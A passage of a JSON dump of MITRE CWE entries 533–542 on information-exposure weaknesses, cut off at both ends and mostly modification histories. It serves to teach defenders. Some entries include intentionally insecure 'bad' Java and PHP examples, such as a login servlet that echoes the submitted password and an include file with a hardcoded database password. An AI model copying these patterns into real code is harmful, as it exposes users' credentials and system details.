NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Affected_Resources, Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Server Log Files","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Server Log Files","attr":{"@_Date":"2018-03-27"}}]}},"534":{"attr":{"@_ID":"534","@_Name":"DEPRECATED: Information Exposure Through Debug Log Files","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because its abstraction was too low-level.  See CWE-532.","Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Debug Log Files","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Debug Log Files","attr":{"@_Date":"2018-03-27"}}]}},"535":{"attr":{"@_ID":"535","@_Name":"Exposure of Information Through Shell Error Message","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A command shell error message indicates that there exists an unhandled exception in the web application code. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"211","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Shell Error Message","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Shell Error Message","attr":{"@_Date":"2020-02-24"}}]}},"536":{"attr":{"@_ID":"536","@_Name":"Servlet Runtime Error Message Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A servlet error message indicates that there exists an unhandled exception in your web application code and may provide useful information to an attacker.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"211","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The error message may contain the location of the file in which the offending function is located. This may disclose the web root\'s absolute path as well as give the attacker the location of application files or configuration information. It may even disclose the portion of code that failed. In many cases, an attacker can use the data to launch further attacks against the system."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following servlet code does not catch runtime exceptions, meaning that if such an exception were to occur, the container may display potentially dangerous information (such as a full stack trace).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String username = request.getParameter(\\"username\\");if (username.length() &lt; 10) {}","xhtml:br":["","",""],"xhtml:i":"// May cause unchecked NullPointerException.","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Servlet Runtime Error Message","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Servlet Runtime Error Message","attr":{"@_Date":"2020-02-24"}}]}},"537":{"attr":{"@_ID":"537","@_Name":"Java Runtime Error Message Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"In many cases, an attacker can leverage the conditions that cause unhandled exception errors in order to gain unauthorized access to the system.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"211","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not expose sensitive error information to the user."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java example the class InputFileRead enables an input file to be read using a FileReader object. In the constructor of this class a default input file path is set to some directory on the local file system and the method setInputFile must be called to set the name of the input file to be read in the default directory. The method readInputFile will create the FileReader object and will read the contents of the file. If the method setInputFile is not called prior to calling the method readInputFile then the File object will remain null when initializing the FileReader object. A Java RuntimeException will be raised, and an error message will be output to the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class InputFileRead {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private File readFile = null;private FileReader reader = null;private String inputFilePath = null;private final String DEFAULT_FILE_PATH = \\"c:\\\\\\\\somedirectory\\\\\\\\\\";public InputFileRead() {}public void setInputFile(String inputFile) {}public void readInputFile() {}","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"#text":"inputFilePath = DEFAULT_FILE_PATH;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* Assume appropriate validation / encoding is used and privileges / permissions are preserved */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (RuntimeException rex) {} catch (FileNotFoundException ex) {...}","xhtml:div":[{"#text":"reader = new FileReader(readFile);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.err.println(\\"Error: Cannot open input file in the directory \\" + inputFilePath);System.err.println(\\"Input file has not been set, call setInputFile method before calling readInputFile\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["","",""]}}]}}}},"Body_Text":"However, the error message output to the user contains information regarding the default directory on the local file system. This information can be exploited and may lead to unauthorized access or use of the system. Any Java RuntimeExceptions that are handled should not expose sensitive information to the user."},{"Intro_Text":"In the example below, the BankManagerLoginServlet servlet class will process a login request to determine if a user is authorized to use the BankManager Web service. The doPost method will retrieve the username and password from the servlet request and will determine if the user is authorized. If the user is authorized the servlet will go to the successful login page. Otherwise, the servlet will raise a FailedLoginException and output the failed login message to the error page of the service.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankManagerLoginServlet extends HttpServlet {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (FailedLoginException ex) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String username = request.getParameter(\\"username\\");String password = request.getParameter(\\"password\\");BankManager bankMgr = new BankManager();boolean isAuthentic = bankMgr.authenticateUser(username, password);if (isAuthentic) {}else {}","xhtml:br":["","","","","","","","",""],"xhtml:i":["// Get username and password from login page request","// Authenticate user","// If user is authenticated then go to successful login page"],"xhtml:div":[{"#text":"request.setAttribute(\\"login\\", new String(\\"Login Successful.\\"));getServletContext().getRequestDispatcher(\\"/BankManagerServiceLoggedIn.jsp\\"). forward(request, response);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"throw new FailedLoginException(\\"Failed Login for user \\" + username + \\" with password \\" + password);","xhtml:br":["",""],"xhtml:i":"// Otherwise, raise failed login exception and output unsuccessful login message to error page"}}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"request.setAttribute(\\"error\\", new String(\\"Login Error\\"));request.setAttribute(\\"message\\", ex.getMessage());getServletContext().getRequestDispatcher(\\"/ErrorPage.jsp\\").forward(request, response);","xhtml:br":["","","",""],"xhtml:i":"// output failed login message to error page"}}]}}}}}},"Body_Text":"However, the output message generated by the FailedLoginException includes the user-supplied password. Even if the password is erroneous, it is probably close to the correct password. Since it is printed to the user\'s page, anybody who can see the screen display will be able to see the password. Also, if the page is cached, the password might be written to disk."}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Java Runtime Error Message","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Java Runtime Error Message","attr":{"@_Date":"2020-02-24"}}]}},"538":{"attr":{"@_ID":"538","@_Name":"Insertion of Sensitive Information into Externally-Accessible File or Directory","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Files or Directories"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Operation","System Configuration"],"Description":"Do not expose file and directory information to the user."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"95"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 12: Information Leakage.&#34; Page 191"}}},"Notes":{"Note":[{"#text":"Depending on usage, this could be a weakness or a category. Further study of all its children is needed, and the entire sub-tree may need to be clarified. The current organization is based primarily on the exposure of sensitive information as a consequence, instead of as a primary weakness.","attr":{"@_Type":"Maintenance"}},{"#text":"There is a close relationship with CWE-552, which is more focused on weaknesses. As a result, it may be more appropriate to convert CWE-538 to a category.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Maintenance_Notes, Name"},{"Modification_Organization":"Veracode","Modification_Date":"2010-09-09","Modification_Comment":"Suggested OWASP Top Ten mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"File and Directory Information Leaks","attr":{"@_Date":"2009-12-28"}},{"#text":"File and Directory Information Exposure","attr":{"@_Date":"2020-02-24"}}]}},"539":{"attr":{"@_ID":"539","@_Name":"Use of Persistent Cookies Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application uses persistent cookies, but the cookies contain sensitive information.","Extended_Description":"Cookies are small bits of data that are sent by the web application but stored locally in the browser. This lets the application use the cookie to pass information between pages and store variable information. The web application controls what information is stored in a cookie and how it is used. Typical types of information stored in cookies are session identifiers, personalization and customization information, and in rare cases even usernames to enable automated logins. There are two different types of cookies: session cookies and persistent cookies. Session cookies just live in the browser\'s memory and are not stored anywhere, but persistent cookies are stored on the browser\'s hard drive.   This can cause security and privacy issues depending on the information stored in the cookie and how it is accessed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Do not store sensitive information in persistent cookies."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Persistent Cookies","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Persistent Cookies","attr":{"@_Date":"2020-02-24"}}]}},"540":{"attr":{"@_ID":"540","@_Name":"Inclusion of Sensitive Information in Source Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Source code on a web server or repository often contains sensitive information and should generally not be accessible to users.","Extended_Description":"There are situations where it is critical to remove source code from an area or server. For example, obtaining Perl source code on a system allows an attacker to understand the logic of the script and extract extremely useful information such as code bugs or logins and passwords.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"538","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","System Configuration"],"Description":"Recommendations include removing this script from the web server and moving it to a location not accessible from the Internet."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Source Code","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Source Code","attr":{"@_Date":"2020-02-24"}}]}},"541":{"attr":{"@_ID":"541","@_Name":"Inclusion of Sensitive Information in an Include File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"If an include file source is accessible, the file can contain usernames and passwords, as well as sensitive information pertaining to the application and system.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"540","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not store sensitive information in include files."},{"Phase":["Architecture and Design","System Configuration"],"Description":"Protect include files from being exposed."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-104"},"Intro_Text":"The following code uses an include file to store database credentials:","Body_Text":["database.inc","login.php","If the server does not have an explicit handler set for .inc files it may send the contents of database.inc to an attacker without pre-processing, if the attacker requests the file directly. This will expose the database name and password."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"&lt;?php$dbName = \'usersDB\';$dbPassword = \'skjdh#67nkjd3$3$\';?&gt;","xhtml:br":["","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"&lt;?phpinclude(\'database.inc\');$db = connectToDB($dbName, $dbPassword);$db.authenticateUser($username, $password);?&gt;","xhtml:br":["","","",""]}}]}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Include Source Code","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Include Source Code","attr":{"@_Date":"2020-02-24"}}]}},"542":{"attr":{"@_ID":"542","@_Name":"DEPRECATED: Information Exposure 